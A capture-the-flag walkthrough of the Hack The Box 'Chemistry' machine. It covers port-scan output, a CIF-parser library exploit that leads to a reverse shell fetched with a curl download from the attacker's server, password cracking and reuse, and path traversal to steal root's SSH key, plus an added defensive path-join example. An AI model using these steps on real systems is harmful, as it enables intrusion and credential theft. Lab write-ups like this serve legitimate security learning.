Chemistry (HTB)

Can you save the world ????

Hello everyone, we are back again with an HTB machine; I have really been enjoying HTB machines recently.


Enumeration.

Port scan.

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLzrl552bgToHASFlKHFsDGrkffR/uYDMLjHOoueMB9HeLRFRvZV5ghoTM3Td9LImvcLsqD84b5n90qy3peebL0=
|   256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIELLgwg7A8Kh8AxmiUXeMe9h/wUnfdoruCJbWci81SSB
5000/tcp open  upnp?   syn-ack ttl 63
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.9.5
|     Date: Mon, 28 Oct 2024 12:54:13 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 719
|     Vary: Cookie
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Chemistry - Home</title>
|     <link rel="stylesheet" href="/static/styles.css">
|     </head>
|     <body>
|     <div class="container">
|     class="title">Chemistry CIF Analyzer</h1>
|     <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
|     <div class="buttons">
|     <center><a href="/login" class="btn">Login</a>
|     href="/register" class="btn">Register</a></center>
|     </div>
|     </div>
|     </body>
|   RTSPRequest:
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

So we have a web page on port 5000, which appears to be served by Werkzeug on Python 3.9.5, and SSH on port 22. Let's see what we have on the web.

So we have a login/register page; let's make an account and see what it is all about.

So we can upload something called a CIF. What are CIF files?

CIF files, or Crystallographic Information Files, are standardized text-based files used to store and share crystallographic data, particularly in fields like chemistry, materials science, and structural biology. These files describe the structure and properties of crystalline materials, including atomic positions, symmetry, and unit cell parameters.

Okkkkk.

From there it's just a matter of googling and you find the answer. 👻

OK. So the server is running Python and the exploit is in a Python library, so I am assuming this is what we are looking for.

Navigating to this git repo, we can see a PoC to test.

So I make it fetch my server to see if it is exploitable or not.

And indeed.

Getting Shell.

So I decided to upload a file containing a reverse shell onto the server.

The file name was bash.sh as in the exploit file, but it kept adding this * so I added it into the file name.

The command I used to upload it onto the server was

curl http://<IP>:<PORT>/<FILENAME> -o <FILENAME>

And then I added executable permissions and ran the file; each operation was sent in its own request. And I got a shell.

Getting Shell as Rosa (Password Reuse On The Top).

To get Rosa's shell, I first looked in her home directory since we have read permission. There was nothing there except an interesting script, but it was not useful. I tried to forward port 8080 but there was nothing. It turned out to be simpler than I thought: I viewed app.py and found that it uses an SQLite DB, which we can find here.

I uploaded this to my machine.

So I took that password and tried to crack it.

Using.

After that I created an SSH key to make things easier.

And copy the private key to your machine.

Shell as Root.

From here things are simple: we see that rosa gives us a hint in her exploit.sh and 1.sh, where we can see that she tries to perform path traversal after the /assets endpoint. So I used port forwarding over SSH.

And I used Burp Suite to check it.

From rosa's exploit we can see that root has an id_rsa, so I tried to access it.

And we can log in as root using this key: copy the SSH key, change its permissions, and log in using it.
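For context on the root step, here is an added example (not code from the box or the write-up) showing why the /assets route on 8080 gave up files outside its directory and what the fix looks like: a naive join of the requested name onto the asset root beside a hardened resolver that refuses anything escaping the root. The asset root path and file names are assumed values for the demo.

```python
# Added example, not from the original write-up. Pure functions so the check
# can be exercised offline; a web framework would call resolve_asset_safe()
# with the already URL-decoded path after the "/assets/" prefix.
import os

ASSET_ROOT = "/opt/app/assets"  # hypothetical asset directory for the demo


def resolve_asset_naive(requested: str, root: str = ASSET_ROOT) -> str:
    """Vulnerable form: the user-controlled name is joined straight onto the
    root. normpath collapses '..' components, so a request with enough of
    them walks above the root, and an absolute request replaces it outright."""
    return os.path.normpath(os.path.join(root, requested))


def resolve_asset_safe(requested: str, root: str = ASSET_ROOT):
    """Hardened form: normalise, then require the result to stay inside root.
    Returns the absolute path on success, None when the request escapes."""
    root_norm = os.path.normpath(root)
    # Strip leading slashes so an absolute request cannot override the root.
    candidate = os.path.normpath(os.path.join(root_norm, requested.lstrip("/")))
    # commonpath is the real containment test. A plain startswith() check is
    # fooled by sibling directories such as /opt/app/assets_private.
    if os.path.commonpath([root_norm, candidate]) != root_norm:
        return None
    # If the asset directory can contain symlinks, also compare
    # os.path.realpath(candidate) against os.path.realpath(root_norm).
    return candidate


if __name__ == "__main__":
    for req in ("css/style.css", "../../../root/.ssh/id_rsa", "/etc/passwd"):
        print(f"{req!r:32} naive={resolve_asset_naive(req)!r} "
              f"safe={resolve_asset_safe(req)!r}")
```

Werkzeug, which serves the app on port 5000, ships an equivalent containment check as `werkzeug.utils.safe_join`; the point of the standalone version is to make the failing cases easy to test.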

Summary.

The machine was so much fun and easy; I loved it.
